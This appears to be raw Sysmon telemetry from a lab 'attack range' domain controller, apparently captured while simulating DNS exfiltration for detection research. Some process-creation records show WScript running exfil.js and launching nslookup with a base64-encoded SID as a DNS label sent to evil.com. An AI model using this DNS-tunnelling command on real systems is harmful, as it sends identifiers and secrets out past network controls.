354300x8000000000000000213921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.148{00000000-0000-0000-0000-000000000000}4284<unknown process>-udpfalsefalse127.0.0.1-51129-false127.0.0.1-53domain 354300x8000000000000000213920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.148{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51129- 354300x8000000000000000213919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.148{00000000-0000-0000-0000-000000000000}4284<unknown process>-udptruefalse127.0.0.1-51129-false127.0.0.1-53domain 354300x8000000000000000213918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.148{00000000-0000-0000-0000-000000000000}4284<unknown process>-udpfalsefalse127.0.0.1-51128-false127.0.0.1-53domain 354300x8000000000000000213917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.148{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51128- 354300x8000000000000000213916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.147{00000000-0000-0000-0000-000000000000}4284<unknown process>-udptruefalse127.0.0.1-51128-false127.0.0.1-53domain 354300x8000000000000000213915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.048{00000000-0000-0000-0000-000000000000}3872<unknown process>-udpfalsefalse127.0.0.1-51127-false127.0.0.1-53domain 354300x8000000000000000213914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.048{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51127- 354300x8000000000000000213913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.048{00000000-0000-0000-0000-000000000000}3872<unknown process>-udptruefalse127.0.0.1-51127-false127.0.0.1-53domain 354300x8000000000000000213912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.047{00000000-0000-0000-0000-000000000000}3872<unknown process>-udpfalsefalse127.0.0.1-51126-false127.0.0.1-53domain 354300x8000000000000000213911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.047{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51126- 354300x8000000000000000213910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.047{00000000-0000-0000-0000-000000000000}3872<unknown process>-udptruefalse127.0.0.1-51126-false127.0.0.1-53domain 354300x8000000000000000213909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.047{00000000-0000-0000-0000-000000000000}3872<unknown process>-udpfalsefalse127.0.0.1-51125-false127.0.0.1-53domain 354300x8000000000000000213908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.047{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51125- 354300x8000000000000000213907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.047{00000000-0000-0000-0000-000000000000}3872<unknown process>-udptruefalse127.0.0.1-51125-false127.0.0.1-53domain 354300x8000000000000000213906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.963{00000000-0000-0000-0000-000000000000}7688<unknown process>-udpfalsefalse127.0.0.1-51124-false127.0.0.1-53domain 354300x8000000000000000213905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.963{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51124- 354300x8000000000000000213904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.962{00000000-0000-0000-0000-000000000000}7688<unknown process>-udptruefalse127.0.0.1-51124-false127.0.0.1-53domain 354300x8000000000000000213903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.962{00000000-0000-0000-0000-000000000000}7688<unknown process>-udpfalsefalse127.0.0.1-51123-false127.0.0.1-53domain 354300x8000000000000000213902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.962{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51123- 354300x8000000000000000213901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.962{00000000-0000-0000-0000-000000000000}7688<unknown process>-udptruefalse127.0.0.1-51123-false127.0.0.1-53domain 354300x8000000000000000213900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.962{00000000-0000-0000-0000-000000000000}7688<unknown process>-udpfalsefalse127.0.0.1-51122-false127.0.0.1-53domain 354300x8000000000000000213899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.962{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51122- 354300x8000000000000000213898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.962{00000000-0000-0000-0000-000000000000}7688<unknown process>-udptruefalse127.0.0.1-51122-false127.0.0.1-53domain 354300x8000000000000000213897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.899{00000000-0000-0000-0000-000000000000}7388<unknown process>-udpfalsefalse127.0.0.1-51121-false127.0.0.1-53domain 10341000x8000000000000000213896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.398{2E1864BB-18FA-629A-AA45-000000005F02}35687732C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-AB45-000000005F02}5596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.398{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.398{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.398{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.398{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.398{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-AB45-000000005F02}5596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.398{2E1864BB-18FA-629A-A945-000000005F02}25567144C:\Windows\system32\cmd.exe{2E1864BB-18FA-629A-AB45-000000005F02}5596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.402{2E1864BB-18FA-629A-AB45-000000005F02}5596C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FA-629A-A945-000000005F02}2556C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluxmnc.tmp 2>&1 10341000x8000000000000000213888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.377{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-AA45-000000005F02}3568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.377{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-AA45-000000005F02}3568C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.361{2E1864BB-18FA-629A-AA45-000000005F02}35687732C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-A945-000000005F02}2556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.361{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-AA45-000000005F02}3568C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.345{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.345{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.345{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.345{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.345{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-A945-000000005F02}2556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.345{2E1864BB-18E0-629A-6742-000000005F02}39764280C:\Windows\System32\WScript.exe{2E1864BB-18FA-629A-A945-000000005F02}2556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.347{2E1864BB-18FA-629A-A945-000000005F02}2556C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluxmnc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.330{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nludip.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.298{2E1864BB-18FA-629A-A745-000000005F02}40607156C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-A845-000000005F02}6688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.298{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.298{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 